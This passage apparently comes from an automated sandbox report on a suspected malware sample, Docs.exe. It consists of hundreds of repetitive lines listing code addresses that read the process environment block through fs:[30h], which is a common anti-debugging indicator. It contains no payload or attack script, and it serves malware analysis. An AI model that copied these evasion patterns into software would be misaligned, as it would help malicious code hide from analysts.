                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015D656A mov eax, dword ptr fs:[00000030h]3_2_015D656A
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015CE53E mov eax, dword ptr fs:[00000030h]3_2_015CE53E
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015CE53E mov eax, dword ptr fs:[00000030h]3_2_015CE53E
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015CE53E mov eax, dword ptr fs:[00000030h]3_2_015CE53E
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015CE53E mov eax, dword ptr fs:[00000030h]3_2_015CE53E
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015CE53E mov eax, dword ptr fs:[00000030h]3_2_015CE53E
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01636500 mov eax, dword ptr fs:[00000030h]3_2_01636500
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01674500 mov eax, dword ptr fs:[00000030h]3_2_01674500
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01674500 mov eax, dword ptr fs:[00000030h]3_2_01674500
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01674500 mov eax, dword ptr fs:[00000030h]3_2_01674500
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01674500 mov eax, dword ptr fs:[00000030h]3_2_01674500
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01674500 mov eax, dword ptr fs:[00000030h]3_2_01674500
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01674500 mov eax, dword ptr fs:[00000030h]3_2_01674500
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01674500 mov eax, dword ptr fs:[00000030h]3_2_01674500
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B0535 mov eax, dword ptr fs:[00000030h]3_2_015B0535
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B0535 mov eax, dword ptr fs:[00000030h]3_2_015B0535
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B0535 mov eax, dword ptr fs:[00000030h]3_2_015B0535
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B0535 mov eax, dword ptr fs:[00000030h]3_2_015B0535
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B0535 mov eax, dword ptr fs:[00000030h]3_2_015B0535
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B0535 mov eax, dword ptr fs:[00000030h]3_2_015B0535
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A65D0 mov eax, dword ptr fs:[00000030h]3_2_015A65D0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DA5D0 mov eax, dword ptr fs:[00000030h]3_2_015DA5D0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DA5D0 mov eax, dword ptr fs:[00000030h]3_2_015DA5D0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DE5CF mov eax, dword ptr fs:[00000030h]3_2_015DE5CF
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DE5CF mov eax, dword ptr fs:[00000030h]3_2_015DE5CF
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DC5ED mov eax, dword ptr fs:[00000030h]3_2_015DC5ED
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DC5ED mov eax, dword ptr fs:[00000030h]3_2_015DC5ED
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A25E0 mov eax, dword ptr fs:[00000030h]3_2_015A25E0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015CE5E7 mov eax, dword ptr fs:[00000030h]3_2_015CE5E7
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015CE5E7 mov eax, dword ptr fs:[00000030h]3_2_015CE5E7
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015CE5E7 mov eax, dword ptr fs:[00000030h]3_2_015CE5E7
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015CE5E7 mov eax, dword ptr fs:[00000030h]3_2_015CE5E7
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015CE5E7 mov eax, dword ptr fs:[00000030h]3_2_015CE5E7
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015CE5E7 mov eax, dword ptr fs:[00000030h]3_2_015CE5E7
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015CE5E7 mov eax, dword ptr fs:[00000030h]3_2_015CE5E7
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015CE5E7 mov eax, dword ptr fs:[00000030h]3_2_015CE5E7
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DE59C mov eax, dword ptr fs:[00000030h]3_2_015DE59C
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016205A7 mov eax, dword ptr fs:[00000030h]3_2_016205A7
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016205A7 mov eax, dword ptr fs:[00000030h]3_2_016205A7
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016205A7 mov eax, dword ptr fs:[00000030h]3_2_016205A7
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015D4588 mov eax, dword ptr fs:[00000030h]3_2_015D4588
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A2582 mov eax, dword ptr fs:[00000030h]3_2_015A2582
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A2582 mov ecx, dword ptr fs:[00000030h]3_2_015A2582
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015C45B1 mov eax, dword ptr fs:[00000030h]3_2_015C45B1
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015C45B1 mov eax, dword ptr fs:[00000030h]3_2_015C45B1
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0162C460 mov ecx, dword ptr fs:[00000030h]3_2_0162C460
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0159645D mov eax, dword ptr fs:[00000030h]3_2_0159645D
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015C245A mov eax, dword ptr fs:[00000030h]3_2_015C245A
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DE443 mov eax, dword ptr fs:[00000030h]3_2_015DE443
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DE443 mov eax, dword ptr fs:[00000030h]3_2_015DE443
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DE443 mov eax, dword ptr fs:[00000030h]3_2_015DE443
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DE443 mov eax, dword ptr fs:[00000030h]3_2_015DE443
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DE443 mov eax, dword ptr fs:[00000030h]3_2_015DE443
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DE443 mov eax, dword ptr fs:[00000030h]3_2_015DE443
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DE443 mov eax, dword ptr fs:[00000030h]3_2_015DE443
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DE443 mov eax, dword ptr fs:[00000030h]3_2_015DE443
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015CA470 mov eax, dword ptr fs:[00000030h]3_2_015CA470
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015CA470 mov eax, dword ptr fs:[00000030h]3_2_015CA470
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015CA470 mov eax, dword ptr fs:[00000030h]3_2_015CA470
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0165A456 mov eax, dword ptr fs:[00000030h]3_2_0165A456
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01626420 mov eax, dword ptr fs:[00000030h]3_2_01626420
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01626420 mov eax, dword ptr fs:[00000030h]3_2_01626420
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01626420 mov eax, dword ptr fs:[00000030h]3_2_01626420
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01626420 mov eax, dword ptr fs:[00000030h]3_2_01626420
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01626420 mov eax, dword ptr fs:[00000030h]3_2_01626420
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01626420 mov eax, dword ptr fs:[00000030h]3_2_01626420
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01626420 mov eax, dword ptr fs:[00000030h]3_2_01626420
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015D8402 mov eax, dword ptr fs:[00000030h]3_2_015D8402
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015D8402 mov eax, dword ptr fs:[00000030h]3_2_015D8402
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015D8402 mov eax, dword ptr fs:[00000030h]3_2_015D8402
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DA430 mov eax, dword ptr fs:[00000030h]3_2_015DA430
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0159E420 mov eax, dword ptr fs:[00000030h]3_2_0159E420
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0159E420 mov eax, dword ptr fs:[00000030h]3_2_0159E420
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0159E420 mov eax, dword ptr fs:[00000030h]3_2_0159E420
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0159C427 mov eax, dword ptr fs:[00000030h]3_2_0159C427
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A04E5 mov ecx, dword ptr fs:[00000030h]3_2_015A04E5
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0162A4B0 mov eax, dword ptr fs:[00000030h]3_2_0162A4B0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015D44B0 mov ecx, dword ptr fs:[00000030h]3_2_015D44B0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A64AB mov eax, dword ptr fs:[00000030h]3_2_015A64AB
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0165A49A mov eax, dword ptr fs:[00000030h]3_2_0165A49A
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A0750 mov eax, dword ptr fs:[00000030h]3_2_015A0750
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E2750 mov eax, dword ptr fs:[00000030h]3_2_015E2750
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E2750 mov eax, dword ptr fs:[00000030h]3_2_015E2750
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015D674D mov esi, dword ptr fs:[00000030h]3_2_015D674D
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015D674D mov eax, dword ptr fs:[00000030h]3_2_015D674D
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015D674D mov eax, dword ptr fs:[00000030h]3_2_015D674D
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A8770 mov eax, dword ptr fs:[00000030h]3_2_015A8770
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B0770 mov eax, dword ptr fs:[00000030h]3_2_015B0770
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B0770 mov eax, dword ptr fs:[00000030h]3_2_015B0770
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B0770 mov eax, dword ptr fs:[00000030h]3_2_015B0770
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B0770 mov eax, dword ptr fs:[00000030h]3_2_015B0770
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B0770 mov eax, dword ptr fs:[00000030h]3_2_015B0770
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B0770 mov eax, dword ptr fs:[00000030h]3_2_015B0770
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B0770 mov eax, dword ptr fs:[00000030h]3_2_015B0770
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B0770 mov eax, dword ptr fs:[00000030h]3_2_015B0770
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B0770 mov eax, dword ptr fs:[00000030h]3_2_015B0770
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B0770 mov eax, dword ptr fs:[00000030h]3_2_015B0770
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B0770 mov eax, dword ptr fs:[00000030h]3_2_015B0770
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B0770 mov eax, dword ptr fs:[00000030h]3_2_015B0770
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01624755 mov eax, dword ptr fs:[00000030h]3_2_01624755
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0162E75D mov eax, dword ptr fs:[00000030h]3_2_0162E75D
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A0710 mov eax, dword ptr fs:[00000030h]3_2_015A0710
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015D0710 mov eax, dword ptr fs:[00000030h]3_2_015D0710
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0161C730 mov eax, dword ptr fs:[00000030h]3_2_0161C730
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DC700 mov eax, dword ptr fs:[00000030h]3_2_015DC700
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015D273C mov eax, dword ptr fs:[00000030h]3_2_015D273C
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015D273C mov ecx, dword ptr fs:[00000030h]3_2_015D273C
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015D273C mov eax, dword ptr fs:[00000030h]3_2_015D273C
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DC720 mov eax, dword ptr fs:[00000030h]3_2_015DC720
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DC720 mov eax, dword ptr fs:[00000030h]3_2_015DC720
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0162E7E1 mov eax, dword ptr fs:[00000030h]3_2_0162E7E1
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015AC7C0 mov eax, dword ptr fs:[00000030h]3_2_015AC7C0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A47FB mov eax, dword ptr fs:[00000030h]3_2_015A47FB
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A47FB mov eax, dword ptr fs:[00000030h]3_2_015A47FB
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016207C3 mov eax, dword ptr fs:[00000030h]3_2_016207C3
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015C27ED mov eax, dword ptr fs:[00000030h]3_2_015C27ED
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015C27ED mov eax, dword ptr fs:[00000030h]3_2_015C27ED
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015C27ED mov eax, dword ptr fs:[00000030h]3_2_015C27ED
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016547A0 mov eax, dword ptr fs:[00000030h]3_2_016547A0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0164678E mov eax, dword ptr fs:[00000030h]3_2_0164678E
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A07AF mov eax, dword ptr fs:[00000030h]3_2_015A07AF
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0166866E mov eax, dword ptr fs:[00000030h]3_2_0166866E
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0166866E mov eax, dword ptr fs:[00000030h]3_2_0166866E
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015BC640 mov eax, dword ptr fs:[00000030h]3_2_015BC640
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015D2674 mov eax, dword ptr fs:[00000030h]3_2_015D2674
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DA660 mov eax, dword ptr fs:[00000030h]3_2_015DA660
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DA660 mov eax, dword ptr fs:[00000030h]3_2_015DA660
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E2619 mov eax, dword ptr fs:[00000030h]3_2_015E2619
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B260B mov eax, dword ptr fs:[00000030h]3_2_015B260B
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B260B mov eax, dword ptr fs:[00000030h]3_2_015B260B
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B260B mov eax, dword ptr fs:[00000030h]3_2_015B260B
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B260B mov eax, dword ptr fs:[00000030h]3_2_015B260B
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B260B mov eax, dword ptr fs:[00000030h]3_2_015B260B
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B260B mov eax, dword ptr fs:[00000030h]3_2_015B260B
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B260B mov eax, dword ptr fs:[00000030h]3_2_015B260B
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0161E609 mov eax, dword ptr fs:[00000030h]3_2_0161E609
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A262C mov eax, dword ptr fs:[00000030h]3_2_015A262C
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015BE627 mov eax, dword ptr fs:[00000030h]3_2_015BE627
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015D6620 mov eax, dword ptr fs:[00000030h]3_2_015D6620
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015D8620 mov eax, dword ptr fs:[00000030h]3_2_015D8620
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0161E6F2 mov eax, dword ptr fs:[00000030h]3_2_0161E6F2
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0161E6F2 mov eax, dword ptr fs:[00000030h]3_2_0161E6F2
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0161E6F2 mov eax, dword ptr fs:[00000030h]3_2_0161E6F2
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0161E6F2 mov eax, dword ptr fs:[00000030h]3_2_0161E6F2
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016206F1 mov eax, dword ptr fs:[00000030h]3_2_016206F1
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016206F1 mov eax, dword ptr fs:[00000030h]3_2_016206F1
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DA6C7 mov ebx, dword ptr fs:[00000030h]3_2_015DA6C7
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DA6C7 mov eax, dword ptr fs:[00000030h]3_2_015DA6C7
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A4690 mov eax, dword ptr fs:[00000030h]3_2_015A4690
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A4690 mov eax, dword ptr fs:[00000030h]3_2_015A4690
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015D66B0 mov eax, dword ptr fs:[00000030h]3_2_015D66B0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DC6A6 mov eax, dword ptr fs:[00000030h]3_2_015DC6A6
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01644978 mov eax, dword ptr fs:[00000030h]3_2_01644978
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01644978 mov eax, dword ptr fs:[00000030h]3_2_01644978
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0162C97C mov eax, dword ptr fs:[00000030h]3_2_0162C97C
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01620946 mov eax, dword ptr fs:[00000030h]3_2_01620946
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01674940 mov eax, dword ptr fs:[00000030h]3_2_01674940
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E096E mov eax, dword ptr fs:[00000030h]3_2_015E096E
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E096E mov edx, dword ptr fs:[00000030h]3_2_015E096E
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E096E mov eax, dword ptr fs:[00000030h]3_2_015E096E
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015C6962 mov eax, dword ptr fs:[00000030h]3_2_015C6962
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015C6962 mov eax, dword ptr fs:[00000030h]3_2_015C6962
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015C6962 mov eax, dword ptr fs:[00000030h]3_2_015C6962
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01598918 mov eax, dword ptr fs:[00000030h]3_2_01598918
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01598918 mov eax, dword ptr fs:[00000030h]3_2_01598918
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0162892A mov eax, dword ptr fs:[00000030h]3_2_0162892A
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0163892B mov eax, dword ptr fs:[00000030h]3_2_0163892B
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0161E908 mov eax, dword ptr fs:[00000030h]3_2_0161E908
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0161E908 mov eax, dword ptr fs:[00000030h]3_2_0161E908
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0162C912 mov eax, dword ptr fs:[00000030h]3_2_0162C912
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0162E9E0 mov eax, dword ptr fs:[00000030h]3_2_0162E9E0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015AA9D0 mov eax, dword ptr fs:[00000030h]3_2_015AA9D0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015AA9D0 mov eax, dword ptr fs:[00000030h]3_2_015AA9D0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015AA9D0 mov eax, dword ptr fs:[00000030h]3_2_015AA9D0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015AA9D0 mov eax, dword ptr fs:[00000030h]3_2_015AA9D0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015AA9D0 mov eax, dword ptr fs:[00000030h]3_2_015AA9D0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015AA9D0 mov eax, dword ptr fs:[00000030h]3_2_015AA9D0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015D49D0 mov eax, dword ptr fs:[00000030h]3_2_015D49D0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016369C0 mov eax, dword ptr fs:[00000030h]3_2_016369C0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015D29F9 mov eax, dword ptr fs:[00000030h]3_2_015D29F9
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015D29F9 mov eax, dword ptr fs:[00000030h]3_2_015D29F9
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0166A9D3 mov eax, dword ptr fs:[00000030h]3_2_0166A9D3
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016289B3 mov esi, dword ptr fs:[00000030h]3_2_016289B3
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016289B3 mov eax, dword ptr fs:[00000030h]3_2_016289B3
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016289B3 mov eax, dword ptr fs:[00000030h]3_2_016289B3
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A09AD mov eax, dword ptr fs:[00000030h]3_2_015A09AD
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A09AD mov eax, dword ptr fs:[00000030h]3_2_015A09AD
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B29A0 mov eax, dword ptr fs:[00000030h]3_2_015B29A0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B29A0 mov eax, dword ptr fs:[00000030h]3_2_015B29A0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B29A0 mov eax, dword ptr fs:[00000030h]3_2_015B29A0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B29A0 mov eax, dword ptr fs:[00000030h]3_2_015B29A0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B29A0 mov eax, dword ptr fs:[00000030h]3_2_015B29A0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B29A0 mov eax, dword ptr fs:[00000030h]3_2_015B29A0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B29A0 mov eax, dword ptr fs:[00000030h]3_2_015B29A0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B29A0 mov eax, dword ptr fs:[00000030h]3_2_015B29A0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B29A0 mov eax, dword ptr fs:[00000030h]3_2_015B29A0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B29A0 mov eax, dword ptr fs:[00000030h]3_2_015B29A0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B29A0 mov eax, dword ptr fs:[00000030h]3_2_015B29A0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B29A0 mov eax, dword ptr fs:[00000030h]3_2_015B29A0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B29A0 mov eax, dword ptr fs:[00000030h]3_2_015B29A0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A4859 mov eax, dword ptr fs:[00000030h]3_2_015A4859
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A4859 mov eax, dword ptr fs:[00000030h]3_2_015A4859
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015D0854 mov eax, dword ptr fs:[00000030h]3_2_015D0854
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0162E872 mov eax, dword ptr fs:[00000030h]3_2_0162E872
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0162E872 mov eax, dword ptr fs:[00000030h]3_2_0162E872
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01636870 mov eax, dword ptr fs:[00000030h]3_2_01636870
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01636870 mov eax, dword ptr fs:[00000030h]3_2_01636870
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B2840 mov ecx, dword ptr fs:[00000030h]3_2_015B2840
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0164483A mov eax, dword ptr fs:[00000030h]3_2_0164483A
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0164483A mov eax, dword ptr fs:[00000030h]3_2_0164483A
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015C2835 mov eax, dword ptr fs:[00000030h]3_2_015C2835
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015C2835 mov eax, dword ptr fs:[00000030h]3_2_015C2835
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015C2835 mov eax, dword ptr fs:[00000030h]3_2_015C2835
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015C2835 mov ecx, dword ptr fs:[00000030h]3_2_015C2835
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015C2835 mov eax, dword ptr fs:[00000030h]3_2_015C2835
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015C2835 mov eax, dword ptr fs:[00000030h]3_2_015C2835
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DA830 mov eax, dword ptr fs:[00000030h]3_2_015DA830
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0162C810 mov eax, dword ptr fs:[00000030h]3_2_0162C810
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0166A8E4 mov eax, dword ptr fs:[00000030h]3_2_0166A8E4
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015CE8C0 mov eax, dword ptr fs:[00000030h]3_2_015CE8C0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DC8F9 mov eax, dword ptr fs:[00000030h]3_2_015DC8F9
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DC8F9 mov eax, dword ptr fs:[00000030h]3_2_015DC8F9
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016708C0 mov eax, dword ptr fs:[00000030h]3_2_016708C0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A0887 mov eax, dword ptr fs:[00000030h]3_2_015A0887
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0162C89D mov eax, dword ptr fs:[00000030h]3_2_0162C89D
